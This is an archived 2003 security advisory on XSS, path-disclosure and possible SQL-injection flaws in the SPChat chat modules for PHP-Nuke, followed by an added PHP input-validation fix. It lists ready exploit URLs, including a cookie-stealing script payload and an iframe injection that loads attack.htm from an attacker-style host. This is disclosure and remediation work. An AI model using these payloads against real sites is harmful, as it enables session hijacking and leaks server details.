[ PHP-Nuke :] Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0

From: Rynho Zeros Web (hackargentinoat_private)
Date: Sat May 31 2003 - 15:29:11 PDT


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
          Vendor URL: http://www.saarport.net
           Vuln Type: XSS (Cross Site Scripting), Path Disclosure, disclosure of
    DB user name, possible SQL injection
              Status: Vendor contacted; the patched version will be available
    shortly.
    (http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
              Author: XyborG (http://www.rzw.com.ar)
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Intro:
    ~~~~~~
    SPChat & WebChat are very good and stable online chat systems, but they
    have their faults :)
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Note:  The name of the WebChat module can vary; I will use that name.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Solution:
    ~~~~~~~~~
    
    The vendor has been contacted and the patched version will be available
    shortly. To fix the script temporarily, you must delete this script from
    your website, or rename it so that nobody has access to it, but check the
    author's website for the new patch, to be able to continue using this
    service.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Exploit:
    ~~~~~~~~
    
    Web Chat 2.0 for PHP-Nuke:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Path Disclosure (see the source code):
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.victim.com/modules/WebChat/out.php
    
    ----- Source Code -----
    
    <br />
    <b>Warning</b>:  Access denied for user: 'victim@localhost' (Using password: YES) in <b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
    </TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect failed<BR>
    <B>MySQL error</B>: 0 ()<BR>
    Session halted.
    
    ----- Source Code -----
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Path Disclosure:
    ~~~~~~~~~~~~~~~~
    http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Path Disclosure & disclosure of DB user name & XSS, SQL Injection?:
    http://www.victim.com/modules/WebChat/in.php
    http://www.victim.com/modules/WebChat/quit.php
    http://www.victim.com/modules/WebChat/users.php
    http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
    http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SPChat Ver. 0.8.0:
    ~~~~~~~~~~~~~~~~~~
    http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>
    
    ----- Source Code For attack.htm for eg. -----
    ?script>
    alert(document.cookie);
    ?/script>
    ----- Source Code For attack.htm -----
    
    (Note:  Replace '?'  by '<')
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    -- 
    XyBØrG
    WebMaster de:
    www.RZWEB.com.ar
    Powered By Dattatec.Com
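
One way to handle the `rid`, `uid` and `username` parameters named in the advisory so that they cannot trigger the path disclosure or the reflected XSS, as an added example that is not part of the original post and not SPChat's own code. `int_param()` and `handle_users_request()` are hypothetical names, the output markup is assumed, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Send PHP warnings to the server log, not the page: the leaked file path and
// DB user name in the advisory came from warnings rendered into the response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Return the parameter as an integer >= $min, or null if absent or non-numeric. */
function int_param(array $query, string $key, int $min): ?int
{
    $value = filter_var($query[$key] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => $min]]);
    return $value === false ? null : $value;
}

/** Hypothetical stand-in for a users.php-style handler: returns [status, body]. */
function handle_users_request(array $query): array
{
    $rid  = int_param($query, 'rid', 1);
    $uid  = int_param($query, 'uid', 1);
    $name = $query['username'] ?? '';

    // Reject bad input instead of passing it on to SQL or to the template.
    if ($rid === null || $uid === null || !is_string($name)
        || !preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $name)) {
        return [400, 'Bad request'];   // generic body: no paths, no SQL errors
    }

    // Escape at output even after validation; in a real query the validated
    // integers would still be bound through a prepared statement.
    $safe = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    return [200, sprintf('<td data-uid="%d" data-rid="%d">%s</td>', $uid, $rid, $safe)];
}

// Constructed sample requests, modelled on the parameters in the advisory.
$samples = [
    ['rid' => '3', 'uid' => '7', 'username' => 'XyborG'],
    ['rid' => 'Non_Numeric', 'uid' => '-1', 'username' => 'Any_Word'],
    ['rid' => '3', 'uid' => '7', 'username' => '"><script>alert(document.cookie);</script>'],
];
foreach ($samples as $q) {
    [$status, $body] = handle_users_request($q);
    echo $status, ' ', $body, PHP_EOL;
}
```

Only the first sample is rendered; the other two get the same generic 400 response, so neither the non-numeric `rid` nor the script payload reaches a query or the page.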
    
    



    This archive was generated by hypermail 2b30 : Mon Jun 02 2003 - 09:15:12 PDT